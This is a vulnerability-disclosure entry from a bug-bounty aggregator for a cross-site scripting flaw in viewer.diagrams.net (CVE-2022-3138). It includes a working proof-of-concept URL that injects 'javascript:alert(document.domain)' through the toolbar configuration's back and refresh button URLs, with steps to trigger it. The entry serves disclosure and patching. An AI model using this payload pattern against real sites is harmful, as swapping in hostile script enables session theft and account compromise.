Lucene search
Joaovitormaia1816A207-6ABF-408C-B19A-E497E24172B3HistorySep 05, 2022 - 10:11 p.m.
XSS at https://viewer.diagrams.net/
2022-09-0522:11:53
joaovitormaia
www.huntr.dev
19
xss
vulnerability
diagrams.net
EPSS
0.001
Percentile
30.0%
Description
The application uses a parameter to specify a url on the refresh and the back button, assigning it to location.href without sanitizing
Proof of Concept
Go to:
https://viewer.diagrams.net/index.html?tags=%7B%7D&highlight=0000ff&&layers=1&nav=1&toolbar=1&toolbar-config=%7B%22backBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D,%22refreshBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D%7D&title=xss.drawio#RdZNdb9sgFIZ%2FjaXtopUDTdZdxkmbatI2TVnVa2qoTQscD%2BPa6a%2FfIYA%2F1lWyZHjOy%2FnikNGdHg6WNfV34EJlJOdDRvcZIasrQjL%2F5fwUCF1HUFnJo2gCR%2FkmIswj7SQX7ULoAJSTzRKWYIwo3YIxa6Ffyp5ALaM2rBLvwLFk6j19kNzVgV6TLxO%2FE7KqU%2BTV5muwaJbEsZK2Zhz6GaI3Gd1ZABdWetgJ5ZuX%2BhLO3X5gHROzwrj%2FHLhvhf35%2BOx7QnLFHvFezqKMbBTqiycw3tK6Uyx186eDZLhozxexRcE6b%2FAyi8mOq8r%2Ff4vBJWcYNfgLppCakuYlxHxmr6wtrWzQuF1sfLr%2BW%2BcMW27dJw5lp7GiSw6aSfM5uEpFr39ct923fP9r%2F3ab3w2H432nL1ZjM8cmTVUR59OkRe20b8AKl62z8CJ2oMAiMWCEr1oq9Q9iSlYGtyWmI5AXr5igxNHYRoOWnPswRV9LJ44NK33MHh8CMgud4cLnnY8d8Q7E8OH9zQs5CNDC2RNK4gFK4yDFl0Q2cd9Pc5lQPRvJdIzFl1CNnqdhwUXsXdrOxiehaVTP8tmDpzd%2FAQ%3D%3D
Click on the refresh or the back icon on toolbar
Related
cvelist
cvelist
CVE-2022-3138 Cross-site Scripting (XSS) - Generic in jgraph/drawio
2022-09-08 09:30:14
osv
osv
CVE-2022-3138
2022-09-08 10:15:08
prion
prion
Cross site scripting
2022-09-08 10:15:00
nvd
nvd
CVE-2022-3138
2022-09-08 10:15:08
cve
cve
CVE-2022-3138
2022-09-08 10:15:08